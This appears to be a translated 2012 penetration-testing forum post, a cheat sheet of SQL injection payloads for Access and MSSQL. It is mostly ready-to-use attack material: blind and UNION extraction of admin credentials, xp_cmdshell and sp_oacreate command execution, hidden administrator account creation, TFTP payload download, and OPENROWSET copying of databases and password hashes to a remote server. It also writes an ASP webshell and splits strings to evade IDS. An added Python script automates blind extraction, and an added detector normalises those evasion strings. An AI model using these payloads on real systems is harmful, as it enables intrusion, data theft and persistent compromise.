中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: SQL Injection Statements 2

Author: admin    Time: 2012-9-15 14:32
Title: SQL Injection Statements 2
1. Check whether an injection point exists. The first condition should leave the page unchanged, the second should change it (throughout this post a leading ; marks a payload that stacks a new statement after the application's own query):
and 1=1
and 1=2

2. Guess the table name. Common table names are admin, adminuser, user, pass, password and so on. Replace <table> with each candidate:
and 0<>(select count(*) from <table>)
and 0<>(select count(*) from admin) --- tests whether a table called admin exists

3. Guess the number of accounts. If 0< returns the normal page and 1< returns the error page, there is exactly one account:
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
Column names can also be guessed with: and (select count(<column>) from <table>)>0


4. Guess the column names. Put the column name you are guessing inside len( ); replace * with the candidate name:
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(name)>0)      (user-name column, guessed here as name)
and 1=(select count(*) from admin where len(password)>0)  (password column, guessed here as password)

5. Guess the length of each column value. Keep changing the >0 until the page comes back normal. These count(*)=1 probes assume the admin table holds exactly one row, as established in step 3:
and 1=(select count(*) from admin where len(<column>)>0)
and 1=(select count(*) from admin where len(name)>6)   error
and 1=(select count(*) from admin where len(name)>5)   normal, so the length is 6
and 1=(select count(*) from admin where len(name)=6)   normal

and 1=(select count(*) from admin where len(password)>11)  normal
and 1=(select count(*) from admin where len(password)>12)  error, so the length is 12
and 1=(select count(*) from admin where len(password)=12)  normal
The length can also be guessed with: and (select top 1 len(username) from admin)>5

6. Guess the characters
and 1=(select count(*) from admin where left(name,1)='a')   --- guess the first character of the user name
and 1=(select count(*) from admin where left(name,2)='ab')  --- guess the second character
Keep adding one character at a time; once you have guessed as many characters as the length found above, the account name is complete.

The content can also be guessed by character code:  and (select top 1 asc(mid(password,1,1)) from admin)>50
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
This query can also recover Chinese user names and passwords: replace the trailing number with the character's code and convert the results back to characters afterwards. (asc() and mid() are Access/VBA functions; on SQL Server use ascii() and substring().)
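The boolean-based extraction of steps 3 to 6, carried through end to end as an added example that is not part of the original post. It runs against an in-memory SQLite database standing in for the vulnerable site (the news and admin tables, the single row root / s3cretpass12 and the page_has_rows endpoint are all constructed for this example), uses SQLite's length()/substr()/unicode() where the post uses len()/left()/asc(mid()), and generalises the one-value-at-a-time guessing to a binary search over the character code, which is what makes non-ASCII (e.g. Chinese) values practical. It also walks the table list with NOT IN(...), as the post later does against sysobjects, using sqlite_master in its place.

```python
import sqlite3

# Constructed stand-in for the vulnerable site: an in-memory SQLite database with
# a public news table and an admin table (table names, columns and the single
# admin row are invented for this example).
_db = sqlite3.connect(":memory:")
_db.executescript("""
CREATE TABLE news(id INTEGER, topic TEXT);
INSERT INTO news VALUES (1, 'hello');
CREATE TABLE admin(name TEXT, password TEXT);
INSERT INTO admin VALUES ('root', 's3cretpass12');
""")


def page_has_rows(user_input: str) -> bool:
    """The injectable endpoint: the id parameter is concatenated straight into
    the WHERE clause. True stands for the 'normal page', False for the 'error
    page' in the post; a query error counts as the error page too."""
    sql = "SELECT * FROM news WHERE id=" + user_input
    try:
        return _db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def oracle(condition: str) -> bool:
    """Ask one yes/no question by appending ' and (<condition>)' to a known
    valid id, exactly like the 'and 1=(...)' probes in the post."""
    return page_has_rows("1 and (" + condition + ")")


def guess_int(expr: str, lo: int, hi: int) -> int:
    """Recover the integer value of a scalar expression with only true/false
    answers. The post steps '>5', '>6', ... one at a time; this halves the
    interval [lo, hi) instead, so it needs about log2(hi-lo) requests."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def guess_string(expr: str) -> str:
    """Recover a string value: its length first (len() in the post), then each
    character by its code point (asc(mid(...)) in the post). Searching the full
    Unicode range is what lets this handle non-ASCII names and passwords."""
    length = guess_int(f"length({expr})", 0, 256)
    chars = [chr(guess_int(f"unicode(substr({expr},{i},1))", 0, 0x110000))
             for i in range(1, length + 1)]
    return "".join(chars)


def enumerate_tables() -> list[str]:
    """Walk the table list one name at a time with NOT IN(...), as the post
    does against sysobjects; sqlite_master plays the role of sysobjects."""
    found: list[str] = []
    while True:
        excluded = ",".join(f"'{t}'" for t in found) or "''"
        next_name = (f"(select name from sqlite_master where type='table' "
                     f"and name not in ({excluded}) order by name limit 1)")
        if not oracle(f"{next_name} is not null"):
            return found
        found.append(guess_string(next_name))


def dump_admin() -> dict:
    """Full run: list the tables, then pull the admin credentials."""
    return {
        "tables": enumerate_tables(),
        "name": guess_string("(select name from admin limit 1)"),
        "password": guess_string("(select password from admin limit 1)"),
    }


if __name__ == "__main__":
    print(dump_admin())
```

Each recovered character costs about 21 requests at the full Unicode range; restrict hi to 128 when the target is known to be ASCII and it drops to 7. Against a real target, page_has_rows is replaced by an HTTP request whose response is classified as "normal" or "error".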

group by users.id having 1=1--
group by users.id, users.username, users.password, users.privs having 1=1--
(each GROUP BY ... HAVING error names the next column that is missing from the GROUP BY list; add it and repeat until the whole column list is known)
; insert into users values( 666, 'attacker', 'foobar', 0xffff )--

UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id')--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id','login_name')--
UNION SELECT TOP 1 login_name FROM logintable--
UNION SELECT TOP 1 password FROM logintable where login_name='Rahul'--

Check which service pack the server has: comparing @@VERSION with an int raises a conversion error that prints the version string (e.g. showing SP4 is applied)
and 1=(select @@VERSION)--

Check the privileges of the database connection account; a normal page means the login holds the sysadmin server role:
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))--

Identify the login used for the connection (a normal page means the connection uses the sa login):
and 'sa'=(SELECT System_user)--
and user_name()='dbo'--
and 0<>(select user_name())--

Check whether xp_cmdshell has been deleted:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype='X' AND name='xp_cmdshell')--

If xp_cmdshell was deleted, restore it; an absolute path to the DLL is also accepted:
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'--
(On SQL Server 2005 and later xp_cmdshell and the sp_OA* OLE Automation procedures are disabled by default and are switched on with sp_configure, which itself requires sysadmin.)

Reverse-ping test (make the server ping your host):
;use master;declare @s int;exec sp_oacreate 'wscript.shell',@s out;exec sp_oamethod @s,'run',NULL,'cmd.exe /c ping 192.168.0.1';--

Add a Windows account:
;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'--

Create an IIS virtual directory pointing at drive E (mkwebdir.vbs is one of the IIS admin scripts, assumed here to have been copied to wwwroot):
;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"'--

Set its access properties (used together with writing a webshell):
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'

MSSQL also supports UNION queries (the number of selected columns must match the original query; * pulls every admin column into the visible positions):
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin   (union works on Access too)

Trick for revealing the database path: %5c is the URL encoding of \ ; submit the URL with the / (or \) in the path replaced by %5c, and the resulting error message discloses the path of the database file.

Get the web root path:
;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1 swappass from swap)=1--   (the int conversion error prints the stored value)
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(500) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', @value=@test OUTPUT insert into newtable(paths) values(@test)--
;use ku1;--
;create table cmd (str image);--   create a table cmd with an image-type column

Test procedure when xp_cmdshell exists:
;exec master..xp_cmdshell 'dir'
;exec master.dbo.sp_addlogin 'jiaoniang$';--   add a SQL login
;exec master.dbo.sp_password null,'1866574','jiaoniang$';--   (old password, new password, login)
;exec master.dbo.sp_addsrvrolemember 'jiaoniang$','sysadmin';--
;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$ /add';--
exec master..xp_servicecontrol 'start','schedule'   start a service
exec master..xp_servicecontrol 'start','server'
;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'
;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add'
;exec master..xp_cmdshell 'tftp -i <your_ip> get file.exe'--   upload a file with TFTP

;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
;declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
;declare @a sysname;set @a=db_name();backup database @a to disk='\\<your_ip>\<your_share>\bak.dat'
If direct execution is restricted, this works instead (OPENROWSET reconnects to the local server as sa with an empty password and runs the batch under that login):
select * from openrowset('sqloledb','server';'sa';'','select ''OK!''; exec master.dbo.sp_addlogin hax')

Query construction:
SELECT * FROM news WHERE id=... AND topic=... AND .....
admin' and 1=(select count(*) from [user] where username='victim' and right(left(userpass,1),1)='1') and userpass <> '
(the number inside left() is the character position being tested, the compared value is the guessed character)
select 123;--
;use master;--
' or name like 'fff%';--   shows there is a user called ffff
and 1<>(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype='U' and status>0) where name='ffff';--
;update [users] set email=(select top 1 id from sysobjects where xtype='U' and name='ad') where name='ffff';--
;update [users] set email=(select top 1 name from sysobjects where xtype='U' and id>581577110) where name='ffff';--
;update [users] set email=(select top 1 count(id) from password) where name='ffff';--
;update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--
;update [users] set email=(select top 1 name from password where id=2) where name='ffff';--
The statements above fetch the first user table in the database and store its name in the email field of user ffff.
Viewing ffff's profile shows that the first user table is called ad.
The id of table ad is then looked up by name, and the name of the second table is taken from the row whose id is greater than it.

insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
insert into users values( 667,123,123,0xffff)--
insert into users values ( 123, 'admin''--', 'password', 0xffff)--
;and user>0   (forces the current user name to be converted to int; the error message prints the name)
;and (select count(*) from sysobjects)>0
;and (select count(*) from msysobjects)>0   // for an Access database

Enumerate table names
;update aaa set aaa=(select top 1 name from sysobjects where xtype='U' and status>0);--
This writes the first table name into the aaa column.
Having read the first table, the second one is read the same way (append and name<>'<table you just got>' to the condition):
;update aaa set aaa=(select top 1 name from sysobjects where xtype='U' and status>0 and name<>'vote');--
then id=1552 and exists(select * from aaa where aaa>5)
reads out the second table; continue one at a time until none are left.
Columns are read like this:
;update aaa set aaa=(select top 1 col_name(object_id('<table>'),1));--
then id=152 and exists(select * from aaa where aaa>5) raises an error that discloses the column name
;update aaa set aaa=(select top 1 col_name(object_id('<table>'),2));--
then id=152 and exists(select * from aaa where aaa>5) raises an error that discloses the column name
(aaa>5 compares a varchar with an int; SQL Server tries to convert the stored name to int, fails, and quotes the name in the conversion error.)

[Get table names] [update a field to the table name, then find a way to read that field back]
update <table> set <column>=(select top 1 name from sysobjects where xtype='U' and status>0 [ and name<>'<table you already got>', add one per table found ]) [ where <condition> ]
select top 1 name from sysobjects where xtype='U' and status>0 and name not in('table1','table2',...)
Create a database administrator account and a system administrator account through a SQL Server injection [the current login must be in the SYSADMIN role]; see the sp_addlogin / sp_addsrvrolemember / net user sequence above.

[Get column names] [update a field to the column name, then find a way to read that field back]
update <table> set <column>=(select top 1 col_name(object_id('<table to query>'),<column ordinal, e.g. 1>)) [ where <condition> ]

Bypass IDS detection [use variables]
;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
;declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'

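The detection-side counterpart to the variable-concatenation evasion above, added here and not part of the original post: a naive substring signature for xp_cmdshell never sees 'xp_'+'cmdshell', while a detector that first folds adjacent string literals (and char(0x..) calls, the form used in the insert ... char(0x63)+... example earlier) back into one literal does. The signature list and the sample statements are constructed for this example.

```python
import re

# Signatures a naive filter looks for verbatim (an assumed list for this example).
SIGNATURES = ("xp_cmdshell", "sp_oacreate", "openrowset")

# A T-SQL single-quoted literal; a doubled quote inside it is an escaped quote.
_LITERAL = r"'(?:[^']|'')*'"
_CONCAT = re.compile(rf"({_LITERAL})\s*\+\s*({_LITERAL})")
_CHAR_CALL = re.compile(r"char\(\s*(0x[0-9a-f]+|\d+)\s*\)")


def _char_value(token: str) -> int:
    """char(0x78) and char(120) both mean 'x'."""
    return int(token, 16) if token.startswith("0x") else int(token)


def fold_literals(sql: str) -> str:
    """Rewrite char(...) calls as the one-character literal they evaluate to,
    then merge 'a' + 'b' into 'ab' until no adjacent literals are left."""
    sql = _CHAR_CALL.sub(
        lambda m: "'" + chr(_char_value(m.group(1))).replace("'", "''") + "'", sql)
    previous = None
    while previous != sql:
        previous = sql
        # drop the closing quote of the left literal and the opening quote of the right one
        sql = _CONCAT.sub(lambda m: m.group(1)[:-1] + m.group(2)[1:], sql)
    return sql


def normalize(sql: str) -> str:
    """Lower-case, strip /* */ comments used as separators, fold literals and
    collapse whitespace, so the search sees roughly what the server executes."""
    sql = sql.lower()
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)
    sql = fold_literals(sql)
    return re.sub(r"\s+", " ", sql).strip()


def naive_match(sql: str) -> list[str]:
    """Plain case-insensitive substring search, as a simple IDS rule would do."""
    lowered = sql.lower()
    return [s for s in SIGNATURES if s in lowered]


def detect(sql: str) -> list[str]:
    """The same signatures applied after normalization."""
    folded = normalize(sql)
    return [s for s in SIGNATURES if s in folded]


# Constructed sample statements: the plain call, the two split-literal forms
# from the post, a char()-built variant with a comment as spacer, and a benign query.
SAMPLES = [
    ";exec master..xp_cmdshell 'dir'",
    ";declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\\'",
    ";declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\\'",
    ";declare @a sysname set @a=char(0x78)+char(0x70)+'_cm'/**/+'dshell' exec @a 'dir'",
    "SELECT * FROM news WHERE id=1 AND topic='sp_oa'",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"naive={naive_match(s)!s:<16} normalized={detect(s)}  {s}")
```

Folding is a normalization step, not a parser: it does not evaluate variables, so a name assembled in two separate SET statements still slips past, which is why signature matching on raw SQL is a weak control next to removing xp_cmdshell rights and parameterising the application's queries.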
1. Open a remote database
Basic syntax:
select * from OPENROWSET('SQLOLEDB','server=servername;uid=sa;pwd=123','select * from table1')
Parameters: (1) OLEDB provider name, followed by the connection string and the query to run over that connection
2. The connection string can use any port, for example:
select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table')
3. Copy the target host's whole database: insert every local table into a table on the remote server.

Basic syntax:
insert into OPENROWSET('SQLOLEDB','server=servername;uid=sa;pwd=123','select * from table1') select * from table2
This statement copies all data from table2 on the target host into table1 in the remote database. In practice change the IP address and port in the connection string to point where you need (the target must be able to reach your SQL Server on that port), for example:
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table1') select * from table2
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysdatabases') select * from master.dbo.sysdatabases
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysobjects') select * from user_database.dbo.sysobjects
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _syscolumns') select * from user_database.dbo.syscolumns
Copy the database:
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table1') select * from database..table1
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table2') select * from database..table2

Copy the hash table: the login password hashes are stored in sysxlogins (in the master database). Method:
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysxlogins') select * from master.dbo.sysxlogins
Once you have the hashes you can brute-force them.

Walking directories: first create a temporary table temp
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;--   list all drives
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--   list subdirectories
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--   get the whole subdirectory tree and store it in temp
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--   view a file's contents
;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--
;insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc';--
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--   (xp_dirtree is executable by PUBLIC)
Check role membership (a normal page means the login holds that role):
Statement 1: and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
Statement 2: and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--
Statement 3: and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
Statement 4: and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
Statement 5: and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
Statement 6: and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
Statement 7: and 1=(SELECT IS_MEMBER('db_owner'));--

Write the paths into a table:
;create table dirs(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_dirtree 'c:\'--
and 0<>(select top 1 paths from dirs)--
and 0<>(select top 1 paths from dirs where paths not in('@Inetpub'))--
;create table dirs1(paths varchar(100), id int)--
;insert dirs1 exec master.dbo.xp_dirtree 'e:\web'--
and 0<>(select top 1 paths from dirs1)--
(0<>'<path>' forces an int conversion of the directory name, so each error message discloses one entry; exclude the entries already seen with not in(...) to walk through the list.)

Back up the database into the web directory, then download it:
;declare @a sysname; set @a=db_name();backup database @a to disk='e:\web\down.bak';--

and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)   (char(85) is 'U')
and 1=(Select Top 1 col_name(object_id('USER_LOGIN'),1) from sysobjects)   look at the related table
and 1=(select user_id from USER_LOGIN)
and 0=(select user from USER_LOGIN where user>1)

-=- wscript.shell example -=-
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe'--

Read a file line by line through scripting.filesystemobject:
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end

Write a one-line ASP webshell (runs the cmd query-string parameter) into the web root:
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, '<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>'

Make the server speak (speech.voicetext):
declare @o int, @ret int
exec sp_oacreate 'speech.voicetext', @o out
exec sp_oamethod @o, 'register', NULL, 'foo', 'bar'
exec sp_oasetproperty @o, 'speed', 150
exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528
waitfor delay '00:00:05'

; declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528 waitfor delay '00:00:05'--

xp_dirtree is executable by PUBLIC
exec master.dbo.xp_dirtree 'c:\' returns two columns, subdirectory and depth. subdirectory is a character column and depth is an integer column.
create table dirs(paths varchar(100), id int)
Create the table so that it matches what xp_dirtree returns above: the same number of columns with the same types.
insert dirs exec master.dbo.xp_dirtree 'c:\'
As long as the table we create matches the columns the stored procedure returns, the insert ... exec works and the output lands in the table; step by step that gets us the information we want.

Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2